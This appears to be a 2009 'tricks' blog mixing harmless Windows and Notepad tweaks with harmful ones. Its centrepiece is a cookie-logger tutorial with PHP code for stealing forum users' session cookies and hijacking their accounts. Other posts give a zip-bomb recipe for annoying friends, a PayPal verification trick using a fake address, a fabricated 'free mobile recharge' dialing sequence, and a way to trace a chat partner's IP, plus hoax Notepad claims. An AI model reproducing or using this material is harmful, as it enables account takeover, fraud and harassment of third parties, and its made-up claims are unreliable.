Sunday, August 16, 2009

SPEED SHUT DOWN

1> Go to Start.
2> Click on Run.
3> Start Regedit.
4> Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
5> Click on the “Control” Folder.
6> Select “WaitToKillServiceTimeout”
7> Right click on it and select Modify.
8> Set it a value lower than 2000 (Mine is set to 200).

NOTEPAD'S SMALL TWEAK

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again.
see the magic.

OR

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON’T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

OR

Open a Note Pad
type Bush hid the facts
save that file,
close it
again open and see…

NOTEPAD “WORLD TRADE CENTER TRICK” :

Did you know that the flight number of the plane that had hit WTC …on
9/11 was Q33N ….Open your Notepad in ur computer and type the flight
number i.e Q33N… Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings.

LOG TRICK! MAKE YOUR NOTEPAD A DIARY:

Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that.

WHY DOES THIS HAPPEN?

The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a “Byte-Order Mark” (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

FREE MOBILE RECHARGE (Works 200% tested working)

FREEEE MOBILE RECHARGE
go ahead without worrying.You can only do this every 24th & 25th of the month as the network
system is under upgradation.
1.) ** Dial ” 1415007 ” using your h/phone and wait for 5 seconds
2.) ** after 5 seconds, you will hear some funny noise (like sound from
TV when the station is finished)
3.) ** Once the noise stop, immediately dial 9151 follow by your phone
number
4.) ** A recorded message “please insert your pin number” will follow
5.) ** punch in the pin number ” 011785 45227 00734? and wait for the
operator
finish repeating the above pin number.
6.) ** After the pin number has been repeat, dial ” 0405-for AIRTEL,
7.) ** you will hear a message “for air time top-up press 1723? you
just have to follow the instruction
8.) ** After you follow the instruction, the noisy sound will re-appear for about 5 second
9.) ** once the noise stop, dial ” 4455147 ” follow by ” 146 ”
10.) ** after about 5 second, dial ” 1918 ” after 3 second dial ” 4451

11.) ** after you done that, punch in the serial number “01174452271145527 ”
you will hear dial tone.

12.) ** once the dialing tone stop, dial ” 55524785933 ” you will hear ” please
key in your password”

13.) ** the password is ” **** 2+253+7891*+546322 ” wait for the message “your password accepted”
14.) ** you will hear ” please insert your emey number ” now you have to be fast
to dial your own h/phone number
15.) ** you will hear a dialing tone, when the call is answered, dial ”
1566 ” and you will hear “re-confirm emery number”
16.) ** once you hear that message, dial ” 6011556 2245334 follow by your
h/phone number”
17.) ** after a while, you will hear a message “your pin number is accepted” you
have to dial ” 1007 ”

18.) ** after you done that you will hear “your emery number is
accepted”

19.) ** continue dial ” 4566 ” you will hear “your password is
accepted”
20.) ** once the second message finish, immediately dial your own
h/phone number
21.) Now ur phone is recharged by 555/-
enjoyyyyyyyyyyyyyyyy

Disclaimer:- I am not responsible if you get caught

FIND PARTNER IP ADDRESS IN YAHOO MSGR

Open ur DOS prompt..By jus going through START>RUN>(type cmd in a given Box)


Type
cd\ (for going to root)
netstat -n
(wait for a while)

Some thing like this will apear

PROTO LOCAL ADDRESS FOREIGN ADDRESS STATE
TCP 203.46.111.92:1863 177.99.20.35:1099 ESTABLISHED
HTTP 203.46.111.92:1560 177.99.20.35:1054 ESTABLISHED
TCP 203.46.111.92:1501 177.99.20.35:1068 ESTABLISHED

Note: Last four digit will be keep on changing so donot need to note that.
The field we needed is (FOREGIN ADDRESS).
LOCAL ADDRESS is ur IP address.
Then just place this IP to IP tracer and fing it out his/her IPS....
Enjoy...Have fun

Disclaimer:- I am not responsible if you get caught

How to verify your own PayPal without credit card

1. Make sure you have a PayPal account made. If you don't, go to www(dot)paypal(dot)com
2. Now go to N e ts p e n d and click the big green "Open Account" button.
3. Fill out the info, for the address put in anything, could be your real one doesn't matter. They will send a card to that address most people will throw it out as junk mail if its a fake address.
4. Log in to your PayPal account. Hit the "Get verified" link (image provided)
5. When the new page comes up, hit "Add Bank Account".
6. Log into your Netspend account. Go to "Add Funds", then "PayPal Transfers".
7. Copy and paste the necessary info from the Netspend account to the PayPal Verification fields. Wait 3-5 days for the deposit.

Thats it !!! Done !!!! Happy Spending

Courtesy:- Hacking Exposed::Badman(Orkut)

Wednesday, August 5, 2009

ZIP OF DEATH

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Running Multiple Instances of GTALK

Users of Google Talk (GTalk) can also let GTalk go to polygamy, that’s running multiple instances of Google Talk and login to multiple Google accounts on Google Talk. The polygamy trick can be done without any crack, patch or hack, with just a simple command line parameter or switch /nomutex appended to the Google Talk shortcut.

Ability to polygamy running multiple Google Talk is useful if users have multiple Google Talk accounts (or Google or Gmail accounts that used to login to GTalk) or multiple profiles or personalities, and don’t want to log on and off from one account to another account every time when want to switch, or want to log in to all accounts at the same time on the same computer.

You can add the /nomutex switch or parameter to existing Google Talk shortcut, or create a new shortcut with the /nomutex command line parameter.

To edit existing Google Talk shortcut:

1) Right click on the Google Talk shortcut.
2) On the right click contextual menu, click on Properties.
3) Go to Shortcut tab on Google Talk Properties window.
4) On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).

Target: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex

5) Click on OK.


To create a new shortcut for Google Talk:

1) Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2) Select New on the right click context menu.
3) Then select Shortcut.
4) Copy and paste the following line to the text box when prompted to type the location of the item:

“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex

5) Click on Next.
6) Give the shortcut a proper name such as Google Talk or Google Talk Multiple or Google Talk Polygamy.
7) Click OK until you are done.

If you have hex editor, you can act like a hacker and modify the bits in Google Talk program so that it will always allow multiple instances of GTalk to be launched whether the /nomutex switch is specified or not.

Launch hex editor and open googletalk.exe, then search for the following patterns in the hex editor:

004536FD . 3BC6 CMP EAX,ESI
004536FF . 75 05 JNZ SHORT googleta.00453706

Modify the string to look like the following:

004536FD . 8BC1 MOV EAX,ECX
004536FF . EB 05 JMP SHORT googleta.00453706


How this Works?
The mutex is short for mutual exclusion object.
A mutex is a program object that allows multiple program threads to share the same resource, but not simultaneously.

So, in the hack above, we used nomutex (no-mutex) to use the same resources simultaneously....!

Sunday, August 2, 2009

Create a CookieLogger and Hack any Account

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook
, Flickr etc.

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook
, Flickr etc.

What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …

Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

http://w18.easy-share.com/1702516956.html

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error
,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt

Step 4: Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website
then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

http://w14.easy-share.com/1702516964.html

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

Note: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.

Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only.

How to hide files in a jpg(or any other type of picture extension)

Set up:
1. Must have a .zip or .rar compressor.
2. Willingness to learn.

Steps:
1. Save the picture of choice to your desktop.

2. Make a new .rar or .zip folder on your desktop.

3. Add the files you want to hide into the .zip or .rar

4. Click start menu, run, cmd.

5. In Command Prompt type cd "desktop" with the quotation marks.

6. Now type in copy /b "filename.jpg" + foldername.rar outputfilename.jpg

( If you use .zip then: copy /b filename.jpg + foldername.zip outputfilename.jpg)

7. Now there should be the outputed file name with a .jpg extension(or what ever file you hidden files in) on the desktop.
( Do not close Command Prompt just yet )

8. Double click it to open the file and check it out.

9. When your done looking, and want to view the hidden files
Type: ren outputfilename.jpg outputfilename.rar or zip
Now you're done!

A quick info-fact:
With this technique of hiding files in a picture you can send this to anyone and they just have to rename the file extension to .zip or .rar.
With this technique the Al-Qaeda operatives were able to send info to others secretively.

PS:the size of the picture will increase as much as the added rar/zip
PS:If this was helpful please reply to this thread and/or vote
PS:this probably works not just with pictures but with all files

How to convert Firefox into Fasterfox



We all know that Firefox takes a lot of Time to load when it is run for the first time. Today I will show you a simple way to reduce this loading time and thus turn your slow firefox into fast firefox.

You can slash Firefox’s slow load time by compressing the DLLs and executables. There are many choices for compression but I suggest you use UPX which is free, efficient and time proven.

1. Download UPX from http://upx.sourceforge.net/#download
2. Unzip upx.exe into your Firefox installation folder which is normally C:\Program Files\Mozilla Firefox.

3. Make sure Firefox is not running then shell to a command prompt in the Firefox installation directory.

4. Type in the following command in a single line and hit return:

for %v in (*.exe *.dll components\*.dll plugins\*.dll) do upx “C:\Program Files\Mozilla Firefox\%v”

5. If on some later occasion you want to unpack the files, just type in the command above but add the decompression switch “-d” after “do upx.”

What is the Registry?

The Registry is a database used to store settings and options for the 32 bit versions of Mzft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).

The Structure of the Registry
The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.
Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.
There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface.
HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings.
HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer.
HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch.
HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration.
HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system.
Each registry value is stored as one of five main data types:

REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format.

REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32)
REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32)
REG_SZ - This type is a standard string, used to represent human readable text values.
Other data types not available through the standard registry editors include:
REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format.
REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format.
REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type.
REG_NONE - No defined value type.
REG_QWORD - A 64-bit number.
REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format.
REG_RESOURCE_LIST - A device-driver resource list.
Editing the Registry
The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below.
An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit
This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor.

Using Regedit to modify your Registry
Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by right-clicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete.

Google Chrome As a Hacking tool

Google Chrome as a Hacking Tool
This is not a joke. If you are using Google Chrome then it is very easy for a malicious attacker to get the Remote Access of your Computer.

Less than a week after the release of Google (NSDQ:GOOG)’s new Web browser Chrome, security researchers detected a buffer overflow vulnerability that could enable remote attackers to completely take control of a user’s computer.

The detected buffer overflow vulnerability, deemed critical by security experts, is the result of a boundary error in the handling of the “Save As” function. If a user saves a Web page serving malicious content, the program could cause a stack-based overflow error, which could open the door for remote hackers to unleash malicious code on a user’s machine.

Remote attackers could then exploit the flaw by constructing a specially crafted Web page infused with malicious code. The attacker could then entice a victim to open and then save the infected page, which would subsequently download malicious code onto the victim’s computer and give the attacker complete access to the affected system.

Chrome’s latest buffer overflow vulnerability is one of about half a dozen errors detected in the newly released beta Web browser, about half of which allow for remote code execution, experts say. Another vulnerability, discovered shortly after the browser’s release Tuesday, included a carpetbombing glitch that stemmed from a fundamental flaw in the underlying user agent Safari 3.1.

However experts say that several Chrome beta version flaws are anticipated and will likely be worked out with the final version as the browser is subsequently tested.

“I think for a new product like Chrome, it doesn’t concern me much that they’re discovering the number of vulnerabilities and the details are getting out there. That’s the point of beta, especially open source beta,” said John Bambenek, handler for the SANS Internet Storm Center. “I think that the people who are really into getting exploits on a number of machines are not interested in messing with Chrome until (Google)

If u want to know how to hack those who use google chrome.. Post a comment about this post and please click one ad in the left by google

Saturday, August 1, 2009

Add a photo to my computer properties



To do this:

1. Open Notepad.

2. Type the following:

[General]

Manufacturer= "your_name

[Support Information]

Line1= http://www.tricks-cafe.co.cc

Line2= visit http://trickscafe.blogspot.com for more info

3. Save as "oeminfo.ini" in the System32 folder.(Without Quote)

4. Create a bmp file(Your Photo) and save it the System32 folder as "oemlogo.bmp"(Without Quote).

The size of the image should be within 180 (wide) x120 (high) pixels

5. Now Check your My Computer Properties.

It's tested and working

Add The Device Manager To Your Desktop


This allows you to quickly see all the devices attached to your computer.
This way you do not need to restart the computer. To add the Device Manager Icon:
1. Right click on an open area of your desktop.
2. Select New / Shortcut.
3. Type in C:\WINDOWS\CONTROL SYSDM.CPL, SYSTEM, 1.
4. Replace C:\WINDOWS with whatever directory you installed Windows95.
5. Click on the Next box.
6. At the next dialog box type in Device Manager.
7. Click on the Finish when you are done.
Note: Replacing the 1 with a 3 will bring up the Performance Status.

A Quick way to print a Document


There are many ways to prints a document, but you can print a document quickly if you put a shortcut to the printer on your desktop and drag a document icon to it, no need to open file for printing just drag a file to printer icon and get your print.

To do this, first click Start button, Settings, then Printers ( first make sure you installed your printer driver). When the Printers window opens, hold down Ctrl and drag the printer icon to your system desktop.

Now you can drag a document icon and drop it in printer icon on your desktop. Here you will get a print quickly and with out open a file.